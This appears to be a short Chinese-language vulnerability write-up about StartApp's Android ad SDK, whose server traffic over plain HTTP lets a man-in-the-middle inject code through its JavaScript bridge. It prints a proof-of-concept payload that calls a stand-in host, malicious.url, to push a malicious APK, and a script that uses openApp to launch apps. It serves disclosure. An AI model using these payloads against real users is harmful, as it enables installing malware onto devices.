Ad-Like SDK without SSL causes problems of MiTM

StartAppSDK 同服务器的通讯使用 HTTP. 其中 SDK 中, com.startapp.android.publish.JSInterface class中包含以下方法:

  • externalLinks
  • openApp

黑客通过 MiTM 在 resp 中植入 HTML Code:

window.location.replace(“market://details?id=com.malicious.app.package.name”);
startappwall.externalLinks(“http://malicious.url/com.malicious.app.package.name.apk”);

当用户相信并下载安装 APK 后, 黑客可以诱导用户访问页面, 其中页面包含以下代码

<script type = “text/JavaScript”>
   function Attack() {

       startappwall.openApp(“”, “com.malicious.app.package.name”, “”);

       startappwall.openApp(“”, “com.android.vending”, “”); //Launch Google Play

       startappwall.openApp(“”, “com.google.android.gm, “”); //Launch Gmail

       startappwall.openApp(“”, “com.google.android.GoogleCamera”, “”); //Launch Camera

       startappwall.openApp(“”, “com.google.android.calendar”, “”); //Launch Calendar

       startappwall.openApp(“”, “com.android.gallery3d”, “”); //Launch Photo Gallery

   }

</script>

Video

Demo

Ref

How Javascript Bridge Can Allow Man-in-the-Middle Attacks - Appthority

Show Comments